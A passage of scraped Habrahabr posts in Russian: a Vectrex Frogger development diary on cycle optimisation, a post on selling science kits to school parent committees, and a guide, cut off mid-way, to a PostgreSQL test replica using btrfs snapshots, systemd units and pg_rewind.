Я до сих пор не знаю, что вызывает этот эффект — любая техническая информация по этой теме приветствуется. Я думал, что единственное, что случится если обновление будет занимать слишком много времени, это мерцание. Но даже если я устанавливаю таймер „ожидания рекалибровки“ в большее, чем стандартные 30000 тактов, значение, неподвижные векторы ШАТАЮТСЯ! (обычно значение этого таймера инициализируется при включении Vectrex и проверяется в Wait_Recal, чтобы все „кадры“ занимали по времени не меньше 30000 тактов. Прим. пер). Я думаю, существует второе „фиксирующее“ значение, где-то в районе 50000, однако мерцание при этом получается неприемлимое.
Я изменил код так, чтобы надпись 'VECTREX FROGGER' и всё остальное не появлялись на экране одновременно (этот дурацкий текст также требует около 5000-6000 тактов для отрисовки). Шатание (при старте) ушло в прошлое.
Но теперь я обнаружил ещё один эффект ( (который всё ещё можно видеть на настоящем Vectrex, поскольку я не смог исправить это никаким разумным способом). Координаты всегда медленно дрейфуют к +,+ (вверх вправо).
Если вы оставите луч в покое на достаточно долгое время, он уйдёт вверх вправо. Рисование большой лягушки в начале игры прохождением по большому списку векторов, с использованием большого масштаба — довольно длительное. Чтобы полностью нарисовать гигантскую лягушку, требуется около 2000-3000 тактов. За это время луч уплывает примерно на полсантиметра. Нужно рекалибровать луч между отрисовками, что решило бы проблему. Но на это нет достаточно времени :-( (лягушка состоит из 63 векторов, а позиционирование 63 векторов при данном масштабе невозможно никаким образом, который не был бы критичен по времени!
(63 * $90 = 9000 чистое время движения луча, без накладных расходов
63 * $70 = 7000 чистое время рисования векторов, без накладных расходов
накладные расходы = 1000 тактов. Это уже около 17000 тактов только на лягушку. А я ещё хотел скроллящийся текст, плюс должен быть обсчитан морфинг лягушки!)).
Кроме того, фиксированное смещение не может быть задано, поскольку упомянутый дрейф не постоянен. Он зависит от настроения моего Vectrex (в конце концов, это старая аналоговая машина). Так что, лягушка хорошо выглядит на эмуляторе (если в нём не задан дрейф), но на настоящем Vectrex у неё теряется кончик. Это меня слегка беспокоит, но не может быть легко исправлено!
Не считая этого, кажется, всё работает просто замечательно. Я провёл пару недель не занимаясь Vectrex Frogger'ом (и не особенно скучал по нему — поработав какое-то время, я был рад оставить его, в конце концов, в покое).
В один прекрасный день картриджи Джона наконец прибыли.
Попробовал Frogger… И он заработал!!! (отвратительно :()
Каким-то образом я избегал этого ранее, но в самой игре также были неподвижные „шатающиеся“ векторы. И они ШАТАЛИСЬ :-( В тот момент я был готов всё бросить. Я был рад, что достиг цели в 50000 тактов учитывая, что сначала хотел 70000. Однако, этого оказалось далеко недостаточно. Чтобы избавиться от шатания, не было другого способа чем достичь 30000 тактов (на самом деле, это можно понять из исходника Wait_Recal в BIOS. Прим. пер.)
Некоторое время я экспериментировал, чтобы избавиться от неподвижных векторов, изобретал „движущиеся“ дома, пунктирные линии и т.п. Но это практически не помогло. Я СОВСЕМ расстроился. Моя подруга пыталась утешить меня говоря „это не так уж и плохо“, однако с моей точки зрения это было плохо. Я хотел сделать полноценную полную игру Vectrex Frogger БЕЗ компромиссов с „шатанием“.
Я раздумывал поменять все спрайты снова с целью снизить использование векторов, однако это привело бы к спрайтам как в Atari 2600 — скорее угадываемым, чем различимым. Так что, от этой идеи я отказался.
Тут я впервые попытался использовать регистр DP (который ранее был всегда установлен в D0). Более или менее разумное его использование, вкупе с другими оптимизациями, сэкономило мне от 1000 до 2000 байт кода. Это позволило мне снова перенести некоторые функции BIOS в свой код и оптимизировать их. Я выиграл ещё 10000 тактов и достиг 40000, однако терялся в догадках, что ещё можно соптимизировать.
Шаг за шагом проходя по коду и просматривая *.lst файл создаваемый ассемблером, я выискивал узкие места в критичных участках… занимался этим дня полтора… двигаясь маленькими шажками и экономя по 10-20, иногда даже по 100 тактов, я достиг примерно 37000. Такой долгий путь и каждый следующий шаг был всё сложнее. Нужен перерыв…
Отлично поиграл в Diddy Kong на моей N64 (да, у меня кроме Vectrex есть и другие консоли) и у меня созрела идея…
Почему бы не использовать циклы ожидания в функциях позиционирования луча и рисования векторов для чего-то более полезного, чем просто ожидания когда истечёт время в таймере?
Сказано-сделано — после двух дней нервотрёпки, реализации слишком быстрых функций, появления экспонент на экране Vectrex, странных эффектов и… и… и… я сэкономил ещё 5000 тактов! (это было легко сказать, но нервы попортило изрядно — подробности см. в исходниках).
Так или иначе, я был на 32000 (это в худшем случае — с четырьмя занятыми домами, девушкой, крокодилом, выдрой и змеями на экране...)
После этого я не мог и думать больше обо всех этих оптимизациях. Я редактировал все уровни, менял их, удалял спрайты, переставлял спрайты, выключал всякие фишки,… и т.д., хотя уровни всё еще имели тот характер, который я задал им в начале, несмотря на то, что большая их часть слегка изменилась. В конце концов, я это сделал!
КАЖДЫЙ УРОВЕНЬ ОБНОВЛЯЛСЯ МЕНЕЕ ЧЕМ ЗА 30000 ТАКТОВ!!!
Я и правда очень горд своим достижением. И теперь считаю Vectrex Frogger выдающейся программой для Vectrex.
Возможно, это лишь тщеславие с моей стороны, однако я вложил много усилий в Vectrex Frogger и надеюсь, что люди получат удовольствие от игры, а некоторые, быть может, найдут исходники полезными и/или поучительными.
СТОП СТОП СТОП СТОП СТОП СТОП СТОП СТОП СТОП СТОП СТОП СТОП СТОП СТОП СТОП
Ещё один успех в оптимизации! Сегодня я раскрутил пару циклов, что дало выигрыш в скорости около 3000 тактов! Гип-гип ура! Я откатил изменения всех уровней и они всё равно не требуют более 30000 тактов…
Теперь у меня даже есть примерно 1500 тактов в запасе :-) ОКОНЧАНИЕ ФАЙЛА (Наконец-то) Год 2016-й. Свежий взгляд на Frogger
… на этой неделе я вплотную приступил к программированию Frogger'a. В моих планах: Музыка и звуковые эффекты
Более гладкая графика
Вписаться при этом в 30000 тактов
Анимация
Вид „сверху вниз“ (многим не нравится вид сбоку)
Режим двух игроков (по-очереди)
Вероятно, сохранение рекордов
Заставку покрасивше
В последние недели я, время от времени, редактировал в Vide отдельные списки векторов, но только на этой неделе собрал их вместе и перенёс во Frogger (см. гифку).
Менять оригинальные исходники пришлось сильнее, чем я ожидал, поскольку „спрайт“ игрока не имел анимации. И въезжание в старые исходники, которым уже исполнилось 18 лет — тоже не упрощало дело.
Так или иначе, как вы можете видеть, анимированная лягушка в ракурсе „сверху вниз“ — реализована.
Как я писал ранее (напомню — почти 20 лет назад), одной из моих главных задач было уложиться в 30 тысяч тактов, чтобы избежать колебаний изображения.
Поскольку теперь я хотел добавить дополнительных фич, пришлось всматриваться в код снова.
Я менял и подкручивал часть, которая генерировала списки векторов, до тех пор, пока она не стала мегаэффективной. Правда, первый уровень игры (наиболее загруженный) стал отрисовываться всего за 22 тысячи тактов!
Одна проблема — графика была того же типа, что и раньше — »типичной" векторной графикой Vectrex'a, когда частенько на одном из концов линии можно видеть «точку», поскольку луч зажигается слишком рано.
Вуаля!
Посмотрита на нового лягушонка: разве он не прекрасен?
Хотя я и сделал это сам, но всё равно чрезвычайно взволнован тем, как выглядят вектора без точек )
Для тех, кто в теме: Сначала я пытался идти обычным путём, используя таймер T1 для scale и ramp, а shift для гашения.
Как ни старался, всё равно оставался некоторый «нахлёст».
Тогда я попытался использовать вручную PB7 (ramp) и CB2 (blank) — и это действительно помогло. Примерно настолько, насколько можно видеть на фото, однако я не смог придумать, как ускорить этот код так, чтобы он был полезен для Frogger'a.
Левое [так в тексте, прим. пер.] изображение получено с помощью кода смешанного типа — я использовал таймер T1 чтобы переключать ramp, но сигнал blank (CB2) устанавливал вручную (т.е. сдвиговый регистр не использовался вообще).
Тщательно согласовывая задержки, можно сделать гладкие вектора и соптимизировать всё так, чтобы получить от этого практическую пользу для ситуации с большим количеством данных.
Первый уровень Frogger'a перерисовывается с этим кодом (и с играющей музыкой) менее чем за 25 тысяч циклов.
Излишне говорить что, несмотря на то, что Vide очень хороший эмулятор, такого рода эксперименты с точным выдерживанием временных интервалов требуют настоящего Vectrex.
Ещё одна отличная новость в том что, похоже, этот код безглючно работает на всех трёх моих Vectrex'ах.
И наконец, немного видео — первые шаги в качестве уровня как в игровых автоматах (однако, как вы можете заметить, переходы ещё не доделаны). Продолжение...
Я добавил в код Frogger'a «диспетчер». Из диспетчера вызывается старый код для «MoveTo-InBetween». Диспетчер использует подпрограммы так что, теоретически, такты расходуются на JSR и RTS, однако код выглядит настолько приличнее, что я оставил это как есть (поскольку мне не были особо нужны дополнительные такты).
Декодирование YM [музыка, прим пер.] сделано через диспетчер — я разбил декодирование на 9 частей, каждая из которых независима от других и они вызываются в разных частях MoveTo. Таким образом, декодирование YM почти не использует дополнительных тактов.
Почти закончил редактирование спрайтов для вида сверху (см. картинку) — спрайты двух разных машин, фургона, гоночной машины и трактора более-менее похожи на оригиналы.
В целом, списки векторов примерно на треть длинее чем те, что были раньше. Хотя, я думаю что сейчас нарисовано примерно на 40 векторов больше, чем в оригинальном Frogger'e для Vectrex. Я считал только нарисованные объекты, однако в некоторых сценах количество векторов имеет значение. Один только трактор состоит из 26 отдельных векторов. Для Vectrex это гигантское число.
Также я несколько улучшил играбельность, немного растянув игровую область. Frogger теперь не так легко выходит за границы. До крайнего правого дома добраться было очень нелегко. Теперь прыжки чуть медленнее (из-за анимации) и это даже ещё сложнее. Тем не менее, добавить анимацию было хорошей идеей. Прыжки ощущаются более похожими на Frogger, чем это было раньше.
Необходимо ещё много тестировать геймплей, сделать звуковые эффекты и другие вещи, однако дела с новой версией идут отлично. Продолжение продолжается...
Снова позанимался Frogger'ом. Дважды проверил первые 7 уровней и изменил их структуру, чтобы отразить сделанные в спрайтах изменения.
Измерения в Vide показали, что Frogger снова стал чуточку медленнее — 7-й уровень с 4-мя занятыми домами требует около 32 тысяч тактов. Чёрт — я должен буду снова бороться за такты — думал, с этим уже покончено.
Если посмотреть на доступные ресурсы, у меня за плечами теперь гораздо больше, чем в то время, когда я пошёл в университет (посмотрите на картинку справа — это самодельный игровой автомат на базе MAME — догадайтесь, что за Frogger :) [здесь интрига, см. далее — прим. пер.]
Выйдя за лимит в 30 тысяч тактов я уже не рассматриваю возможность добавить отображение информации о рекордах во время игры и это меня беспокоит!
Ниже ещё один пример текущего геймплея Frogger'a. Думаю, я добавлю отсутствующие звуковые эффекты последними — когда дважды проверю и исправлю уровни.
Такое ощущение, что я перемещаюсь назад во времени.
Только что закончил оптимизацию кода, выиграв ещё около тысячи тактов. Однако не могу придумать, что тут ещё можно сделать. Должен сберечь ещё около тысячи тактов (в самых тяжёлых уровнях).
Оптимизацией кода я этого добиться уже не могу, так что буду редактировать новые спрайты — слегка их менять. 26 векторов на трактор (к примеру) — не прокатит.
Посчитал, что каждый нарисованный вектор использует около 50 тактов.
В самых заполнённых уровнях мне нужно сэкономить 50 векторов.
Поскольку отображаются около 20-25 объектов, я должен откромсать от каждого примерно по два вектора — это должно быть выполнимо :-)
После того, как каждый уровень будет снова укладываться в менее чем 30 тысяч, займусь остальными эффектами, тогда это всё действительно будет выглядеть и ощущаться как Frogger. Ещё нужно вылизать «антракты» и сделать получше заставку… и, вуаля, где-нибудь в 2017-м закончу… Десять минут продолжения....
Небольшой отчёт о продвижении в работе над новой версией Frogger.
Почти готово!
Вероятно я ещё кое-что пофиксю, соптимизирую и улучшу, однако добавление фич завершено.
По сравнению с исходным Vectrex Frogger'ом были изменены следующие вещи: вид сверху машин и лягушонка
более гладкие вектора
во время геймплея отображаются очки, урови и жизни
игровая область немного расширена
больше звуков и музыки
опции одного и двух игроков
в режиме одного игрока добавлена опция «тренировки»
опция для включения/выключения музыки
5 лучших рекордов сохранены в ППЗУ DS2431
новый главный экран
демо режим
Кроме того удалены: «антракты»
режим паузы
Я пока что в раздумьях, нужно ли менять уровни с тем, чтобы они больше походили на «оригинал». В оригинальном Frogger'е (из игровых автоматов) две соседних полоски воды двигались в одном направлении — это я пока не взял в расчёт. Так что, полоски выше ощущаются по-другому.
Так или иначе, хватит разговоров… Вот десятиминутное видео текущей версии: Больше никакого Frogger'a!
Я остановил работу над исходниками и решил, что новой версии Vectrex Frogger не будет.
Ввиду определённых обстоятельств о которых я скажу ниже, Vectrex Frogger мёртв и единственной доступной версией будет та, которую я сделал 18 лет назад.
Почему я больше не буду над этим работать?
— Всё завершено!
Если не считать возможных багфиксов.
Почему не будет новой версии Frogger?
— Потому что я решил переименовать её.
Я знаю, Frogger — популярное название. Однако, будем честными, ни одна Vectrex игра не достигнет славы оригинала.
И, хотя на игру над которой я работал меня вдохновил Frogger, определённо это уже другая игра!
Поэтому я решил изменить рабочее название на окончательное:
Вам, вероятно, это название ни о чём не говорит, однако в начале 1990-х я написал игру под DOS, которая называлась именно так.
(см.: Karl Quappe – DOS , или, на более старой страничке: Karl Quappe – AOL )
Для читателей, которые не читают по-немецки, вот та же самая информация о названии, что и на страничке AOL:
«KAULQUAPPE» переводится как «головастик», «QUAPPE» — сокращение от головастика, а KARL — просто имя похожее на «KAUL» (омофон). Так что, если вы хотите перевести это, к примеру, на английский, вы получите что-то типа «CHARLES POLE» (Charles — английская версия Karl) или Tedpole ('Ted' — имя, звучащее похоже на 'tad')'
Далее идёт ещё одно короткое видео. Больших изменений нет, просто кое-что отшлифовано. Я позволил игре запуститься самой — не касался кнопок, так что геймплей который вы видите — это демо режим.
Наслаждайтесь! | https://habrahabr.ru/post/317656/ |
habrahabr | Как мы решили проблему родительских комитетов и заработали миллион рублей | ['простая наука', 'родительский комитет', 'школа', 'эксперименты', 'опыты', 'наборы для детей', 'подарки на любые праздники'] |
Если вы читали мои посты про то, как развивается проект «Простая Наука», то значит уже слышали о серии наборов «Эксперименты в коробочке». Сегодня я расскажу, как мы собрали эти наборы в... |
Если вы читали мои посты про то, как развивается проект «Простая Наука», то значит уже слышали о серии наборов « Эксперименты в коробочке ». Сегодня я расскажу, как мы собрали эти наборы в комплекты по 25 штук и увеличили объем продаж более чем на один миллион рублей за счет родительских комитетов в школах и детских садах.
Итак, родительские комитеты. Кто это? Целевая аудитория
Это мамы (очень редко папы), которые занимают активную жизненную позицию. Их детям от 6 до 12 лет. Эти люди способны каким-то чудесным образом принимать решение за всех родителей из класса, где учится их ребенок. Я понимаю, что это звучит странно и даже возмутительно, но, если отбросить субъективность и посмотреть правде в глаза… уверен, вы со мной согласитесь. Они принимают решения. У меня есть сын, и я знаю, что говорю.
Ниже я буду называть этих мам (реже — пап) просто «родительский комитет». Выявление проблемы
«Родительский комитет» в течении года сталкивается с несколькими проблемами, одна из которых — выбор и закупка подарков на весь класс . Вот 4 периода в году, когда у них «болит голова» по этому поводу: 1 сентября;
Новый год;
23 февраля и 8 марта;
конец учебного года.
Итак, кто эти люди — мы знаем. Какая у них проблема (потребность) — знаем. Когда она возникает — знаем. Решение их проблемы
Что они могут покупать на подарки? Ну, в Новый год — конфеты. На начало и конец учебного года — книги (в детстве никогда не любил этот их подход) ). Но если они подарят ребенку то, что понравится именно ему (а не родителям), и по стоимости это будет посильно родителям всех детей из класса, их проблема решена на 5 с плюсом. Доступная цена
Начнем, пожалуй, с самого главного критерия, с цены. Как я уже писал выше, если у родителей всех детей из класса будет финансовая возможность без особых проблем «скинуться» на подарки, то родительский комитет избежит дополнительных хлопот с улаживанием этого вопроса.
Наши наборы « Эксперимент в коробочке » в рознице стоят 195 рублей . С чистой совестью заявляю — это самая низкая цена за подобный товар на рынке. Но родительский комитет будет покупать не один набор, а на класс, и поэтому вправе рассчитывать еще и на скидку.
Нам тоже выгодно продать этот комплект дешевле: за один набор получается 150 руб., вместо 195 руб. Причина проста: один заказчик — одна цепочка действий, три заказчика — три цепочки. согласование заказа (письмо и/или звонок);
отслеживание оплаты;
упаковка каждой посылки отдельно;
отправка трек-номера для отслеживания.
И это не говоря о первичной переписке, — ведь многим при выборе требуются дополнительные консультации.
Кстати, может показаться, что особой разницы нет между ценой 150 руб. и, например, 390 руб. Тут можно спорить или обратиться к фактам. Раньше мы продавали для родительских комитетов книги и при закупки на класс одна книга им обходилась в 390р. И что вы думаете? Большинству родительских комитетов не удавалось собрать с родителей этих денег. А когда мы предложили им товар более чем в два раза дешевле, эта проблема исчезла сама собой. Выбор по возрасту
Родительские комитеты особо активны в начальных классах школы и в детском саду, где дети в возрасте 6 — 10 лет. А так как у нас есть пять наборов на возраст 6+ и пять наборов на 12+, то выбрать то, что нужно, труда не составит.
В интернет-магазине мы разделили их на два разных каталога: Правильные габариты
Если вы когда-нибудь покупали что-либо в большом количестве, то сталкивались с проблемой габаритов при транспортировке. Мы не стали помещать в упаковку «воздух», а наоборот убрали его оттуда. Это позволило уменьшить объем упаковки до минимума. Надежная транспортировка
Что может случиться с товаром при отправлении, скажем, через «Почту России», описывать думаю не стоит. Специально под эти комплекты была изготовлена технологическая упаковка, которая, кроме всего прочего, спасает коробочки от любой «почта-катастрофы». Сама коробка из 3 мм картона, а внутри 5 отсеков по 5 наборов в каждом. В упакованном виде она напоминает кирпич. Сертификаты
Родительский комитет всегда запрашивает сертификаты, это для них важно. Значит нужно, чтобы все наборы прошли процесс сертификации. В одном из прошлых постов я описывал процесс прохождения сертификации наших наборов, повторно описывать не буду, кому хочется, можете прочесть. Сухой остаток
Нам осталось сообщить о наличии этих комплектов родительским комитетам, и дело в шляпе. Что мы и сделали. Как это было сделано, описывать я бы не хотел. У меня же на носу 23 февраля, 8 марта и конец года…
Сообщу только итоги. Было продано: 164 комплекта в ноябре;
192 комплекта в декабре (по сегодняшний день)
Выходит и правда, достаточно решить проблему клиента за него и он твой. Минутка рекламы
И, пользуясь случаем, хочу обратиться к вам лично. Если вы — тот человек , который принимает решение за весь класс, — давайте дружить! Напишите мне в личное сообщение и с меня доп. скидка! )
Если вы знакомы с такими людьми , перешлите им, пожалуйста, ссылку на этот пост. Уверен, эта информация им пригодится.
Ну и наконец, если вам не нужно решение на класс , а нужен индивидуальный Новогодний подарок , то по традиции купон на скидку habrahabr на эти комплекты.
| https://habrahabr.ru/company/gtv/blog/317648/ |
habrahabr | PostgreSQL slave + btrfs и systemd = горячая тестовая база | ['postgresql', 'btrfs', 'systemd', 'testing', 'snapshots', 'master-slave replication', 'pg_rewind', 'никто не читает теги'] |
При активной разработке ПО нередко нужна тестовая база с актуальными данными из боевой базы. Хорошо, если база маленькая и развернуть копию не долго. Но если в базе десятки гигабайт данных и все... | При активной разработке ПО нередко нужна тестовая база с актуальными данными из боевой базы. Хорошо, если база маленькая и развернуть копию не долго. Но если в базе десятки гигабайт данных и все нужны для полного тестирования, да ещё и посвежее, то возникают трудности. В этой статье я опишу вариант преодоления подобных неприятностей с помощью snapshot-ов btrfs. А управлять работой получившегося комплекса будет systemd – удобный и функциональный инструмент. Подготовка На серверах я использовал: Debian jessie 4.7.0-0.bpo.1-amd64 #1 SMP Debian 4.7.8-1~bpo8+1
btrfs-progs v4.7.3
systemd 230
postgresql 9.6.1 Но это не принципиально.
В разделе btrfs, который будет отдан под базу, создаём два тома: btrfs subvolume create /var/lib/postgresql/slave
btrfs subvolume create /var/lib/postgresql/snapshot В первом будут храниться данные базы, а во втором shapshot-ы этих данных. Первым делом нужно поднять PostgreSQL slave базу, которая в обычном режиме будет содержать полную копию данных мастера. Алгоритмы развёртывания уже не однократно описаны, потому коротко и по существу: Master postgresql.conf max_wal_senders = 3 # max number of walsender processes
# (change requires restart)
wal_keep_segments = 64 # in logfile segments, 16MB each; 0 disables
archive_mode = on # allows archiving to be done
# (change requires restart)
archive_command = 'test ! -f /var/lib/postgresql/9.6/main/archive/%f.7z && 7za a /var/lib/postgresql/9.6/main/archive/%f.7z -pочень_секретный_пароль_который_нам_ещё_пригодится -mx7 -mhe=on %p' Таким образом по заполнении очередного WAL сегмента, запускается процесс архивирования его в специальную директорию archive в папке базы. В моём случае, дальше эти архив-логи передаются открытыми каналами и некоторое время хранятся в разных местах, потому шифруются и защищаются паролем. Срок, который будем хранить архив-логи, определит промежуток времени, на который мы можем восстановить состояние базы-slave. При активных изменениях базы количество WAL-логов может очень быстро расти, пожирая свободное место и тут архивирование очень полезно. Чистить архив-логи нужно самостоятельно, например так: find /var/lib/postgresql/9.6/main/archive/ -type f -mtime +10 -print0 | xargs -0 -n 13 /bin/rm Slave postgresql.conf data_directory = '/var/lib/postgresql/slave/9.6/main' # use data in another directory
hot_standby = on # "on" allows queries during recovery Директорию базы помещаем на один уровень ниже стандартного в каталог " slave ", так как /var/lib/postgresql — точка монтирования раздела btrfs. Slave recovery.conf standby_mode = 'on'
primary_conninfo = 'host=master.host port=5432 user=replicator password=пароль'
trigger_file = '/var/lib/postgresql/slave/9.6/main/trigger'
restore_command = '7za e /mnt/backup/postgresql/archive/%f.7z -pа_вот_и_пригодился_очень_секретный_пароль -so > %p' При такой настройке база запускается в slave-режиме и получает изменившиеся данные напрямую от мастера. А если вдруг данных на мастере уже не будет, то поднимет необходимый сегмент данных из директории /mnt/backup/postgresql/archive/ . Архив-логи туда попадают с помощью rsync, который периодически забирает обновления с мастера. Я забираю в режиме синхронизации с удалением, но можно их и хранить произвольный период времени. Так же база следит за появлением trigger-файла и если он появился, то переключается в режим мастера и готова сама обрабатывать все запросы. С этого момента master и slave базы рассинхронизируются. А блестящая идея заключается в том, чтобы перед переключением сделать снимок slave-базы и, после необходимых экспериментов, вернуть его на место, как будто ничего и не было. Поднявшись, база обнаружит, что отстала от мастера, используя архив-логи догонит и войдёт в штатный slave-режим. Эта операция занимает существенно меньше времени, чем полное восстановление из бекапа. Реализуем идею средствами systemd, который позволит не только автоматизировать процесс, но и учесть необходимые зависимости и нежелательные конфликты. Предполагаю, что вы уже знакомы с тем, как работает и конфигурируется systemd, но постараюсь подробно описать используемые параметры. Настройка systemd Первым делом смонтируем раздел, где хранятся данные базы. У меня всё собрано в LXC контейнере, в который раздел с btrfs попадает блочным устройством по пути /dev/pg-slave-test-db . Создадим элемент (unit) systemd типа .mount : /etc/systemd/system/var-lib-postgresql.mount [Unit]
Description=PostgreSQL DB dir on BTRFS
Conflicts=umount.target
[Mount]
What=/dev/pg-slave-test-db
Where=/var/lib/postgresql
Type=btrfs
Options=defaults
TimeoutSec=30
[Install]
WantedBy=multi-user.target Название элемента определяется точкой монтирования. Conflicts=umount.target обеспечит отмонтирование раздела при выключении. Тут есть момент: указывать можно не только абсолютные пути, но и использовать уникальный UUID идентификатор устройства. Но, при запуске в LXC контейнере наткнулся на странное — UUID в системе не виден до тех пор, пока его явно не запросить командой blkid . Потому использую абсолютный путь. Этот юнит можно запускать как самостоятельно, так и использовать в зависимостях, что мы и будем делать. Создадим элемент systemd, описывающий запуск PostgreSQL в slave-режиме. База предварительно настроена на запуск в ручном режиме, в debian это делается в файле /etc/postgresql/9.6/main/start.conf . Так же, при наличии службы [email protected] , её нужно выключить. /etc/systemd/system/postgres-slave.service [Unit]
Description=Restore PostgreSQL base snapshot and Switch the PostgreSQL base in slave mode.
After=network.target var-lib-postgresql.mount postgresql.service
Requires=var-lib-postgresql.mount
Conflicts=postgres-master.service
[Service]
Type=oneshot
RemainAfterExit=yes
User=root
TimeoutSec=300
ExecStartPre=-/usr/bin/pg_ctlcluster -m fast 9.6 main stop
ExecStartPre=/bin/bash -c 'if [[ -d "/var/lib/postgresql/snapshot/auto" ]]; then /bin/btrfs subvolume delete /var/lib/postgresql/slave; fi'
ExecStartPre=/bin/bash -c 'if [[ -d "/var/lib/postgresql/snapshot/auto" ]]; then /bin/mv -v /var/lib/postgresql/snapshot/auto /var/lib/postgresql/slave; fi'
ExecStart=/usr/bin/pg_ctlcluster 9.6 main start
ExecStop=/usr/bin/pg_ctlcluster -m fast 9.6 main stop
[Install]
WantedBy=multi-user.target Подробно разберём. Параметр After задаёт желаемую очерёдность запуска службы, но ни к чему не обязывает, в отличии от Requires . Последний требует, чтобы была активна указанная служба и попытается её активировать. Если это не удастся, то служба целиком перейдёт в состояние " fail ". Параметр Conflicts говорит, что наша служба не может сосуществовать с указанной и одну из них нужно выключить. В данном случае, при запуске службы " postgres-slave.service " будет автоматически выключена " "postgres-master.service " (которую мы опишем ниже), что очень удобно. Type=oneshot говорит о том, что данная служба быстро отработает и нужно подождать до конца. А RemainAfterExit=yes оставит службу в состоянии " active " после успешного завершения требуемых действий. Так как мы будем создавать снимки и управлять базой данных, то желательно увеличить таймаут, который по умолчанию 30 секунд. Дальше, по сути, выполняется скрипт, который приводит систему в желаемое состояние. Команды ExecStartPre выполняются перед основной командой ExecStart по порядку и каждая ждёт успешного завершения предыдущей. Но у первой команды указан модификатор " - ", который позволяет продолжить выполнение, не смотря на код возврата. Ведь база может быть уже остановлена на момент запуска. выполняемый при запуске скрипт: /usr/bin/pg_ctlcluster -m fast 9.6 main stop
/bin/bash -c 'if [[ -d "/var/lib/postgresql/snapshot/auto" ]]; then /bin/btrfs subvolume delete /var/lib/postgresql/slave; fi'
/bin/bash -c 'if [[ -d "/var/lib/postgresql/snapshot/auto" ]]; then /bin/mv -v /var/lib/postgresql/snapshot/auto /var/lib/postgresql/slave; fi'
/usr/bin/pg_ctlcluster 9.6 main start Абсолютные пути до программ обязательны. Там, где при выполнении необходимо проверить текущее состояние системы, вызывается bash и выполняется небольшой скрипт. Итак: На первом шаге выключаем работающую базу с параметром " -m fast ", чтобы не ждать отключения всех клиентов.
Проверяем, есть ли директория " /var/lib/postgresql/snapshot/auto ", в которой хранится последний снимок базы в slave-режиме, и которая появляется в результате работы службы " postgres-master.service ". Если снимок есть, значит, текущее состояние базы — master. Удаляем данные тестовой базы ( /var/lib/postgresql/slave ).
И восстанавливаем на это место снимок.
После успешного выполнения подготовительных команд, запускаем базу.
Последняя команда " ExecStop " определяет, как служба будет выключаться. Служба самодостаточна и её можно добавлять в автозапуск при старте системы. Создадим элемент systemd, описывающий запуск PostgreSQL в master-режиме. /etc/systemd/system/postgres-master.service [Unit]
Description=Create PostgreSQL base Snapshot and Switch the PostgreSQL base in master mode.
After=network.target var-lib-postgresql.mount postgresql.service
Requires=var-lib-postgresql.mount
Conflicts=postgres-slave.service
[Service]
Type=oneshot
RemainAfterExit=yes
User=root
TimeoutSec=300
ExecStartPre=-/usr/bin/pg_ctlcluster -m fast 9.6 main stop
ExecStartPre=/bin/bash -c 'if [[ -d "/var/lib/postgresql/snapshot/auto" ]]; then /sbin/btrfs subvolume delete /var/lib/postgresql/snapshot/auto; fi'
ExecStartPre=/bin/btrfs subvolume snapshot /var/lib/postgresql/slave /var/lib/postgresql/snapshot/auto
ExecStartPre=/usr/bin/touch /var/lib/postgresql/slave/9.6/main/trigger
ExecStart=/usr/bin/pg_ctlcluster 9.6 main start
ExecStop=/usr/bin/pg_ctlcluster -m fast 9.6 main stop
[Install]
WantedBy=multi-user.target В конфликтах у службы, конечно же" postgres-slave.service ". Выполняемый скрипт сводится к следующему: /usr/bin/pg_ctlcluster -m fast 9.6 main stop
/bin/bash -c 'if [[ -d "/var/lib/postgresql/snapshot/auto" ]]; then /sbin/btrfs subvolume delete /var/lib/postgresql/snapshot/auto; fi'
/bin/btrfs subvolume snapshot /var/lib/postgresql/slave /var/lib/postgresql/snapshot/auto
/usr/bin/touch /var/lib/postgresql/slave/9.6/main/trigger
/usr/bin/pg_ctlcluster 9.6 main start Останавливаем работающую базу.
Проверяем, есть ли старый снимок базы по пути " /var/lib/postgresql/snapshot/auto ", если есть — удаляем.
Создаём новый снимок последних данных базы.
Создаём триггер-файл, который и переведёт базу в режим мастера.
Поднимаем базу.
С этого момента, можно выполнять самые смелые эксперименты над данными. А когда надоест, запустив службу " postgres-slave.service " вернуть всё на место. Переключения базы в различные режимы можно настроить по крону, по каким-либо критериям, через зависимые службы или даже завести элемент systemd типа " .socket " и поднимать тестовую базу при первом запросе к приложению. Благо, systemd позволяет. Мониторить текущее отставание от базы-мастера, можно с помощью запроса: postgres=# select now() - pg_last_xact_replay_timestamp() AS replication_delay; Который не составит труда подвесить на тот же zabbix. UPD pg_rewind В комментариях прозвучали многочисленные опасения в стабильности btrfs как таковой и сомнения в пригодности использования её для хранения базы данных в частности. Поэтому, предлагаю вариант адаптации вышеизложенной концепции под возможности утилиты pg_rewind . Утилита эта находит точку рассинхронизации master-а и slave-а и приводит целевую базу в последние состояние перед рассинхронизацией. Но это только состояние, для того, чтобы восстановить данные, будут необходимы все накопившиеся WAL-логи. Также pg_rewind качает с мастера довольно большой объём данных, даже если базы разъехались только-что (в моём случае ~10Г). И целевая база должна корректно завершить работу перед операцией синхронизации. Итак: В конфигурации тестовой базы необходимо включить опцию wal_log_hints = on , которая необходима для pg_rewind , а также может ухудшить производительность. На master-е необходимо разрешить доступ с тестового сервера пользователю с правами супер-пользователя.
Из скриптов systemd убираем все вхождения btrfs и работу со snapshot-ами. " postgres-master.service " станет совсем простой и сведётся к созданию trigger-файла.
Скрипт " postgres-slave.service " будет приблизительно таким:
/etc/systemd/system/postgres-slave.service [Unit]
Description=Restore PostgreSQL base snapshot and Switch the PostgreSQL base in slave mode.
After=network.target var-lib-postgresql.mount postgresql.service
Requires=var-lib-postgresql.mount
Conflicts=postgres-master.service
[Service]
Type=oneshot
RemainAfterExit=yes
User=root
# Может понадобится и ещё больше.
TimeoutSec=300
ExecStartPre=-/usr/bin/pg_ctlcluster -m fast 9.6 main stop
ExecStartPre=/bin/bash -c 'if [[ -e "/var/lib/postgresql/slave/9.6/main/recovery.done" ]]; then /usr/lib/postgresql/9.6/bin/pg_rewind -D /var/lib/postgresql/slave/9.6/main/ --source-server="host=master.host port=5432 user=postgres password=очень_очень_секретный_пароль" --progress ; /bin/cp /var/lib/postgresql/recovery.conf /var/lib/postgresql/slave/9.6/main/recovery.conf; fi'
ExecStart=/usr/bin/pg_ctlcluster 9.6 main start
ExecStop=/usr/bin/pg_ctlcluster -m fast 9.6 main stop
[Install]
WantedBy=multi-user.target Перед началом работы pg_rewind необходимо корректно завершить работу базы.
Если база в состоянии master, то начинаем её синхронизацию с основной базой: Прогоняем pg_rewind с указанием целевой директории базы ( -D ), параметрами подключения к мастеру и ключом подробного вывода.
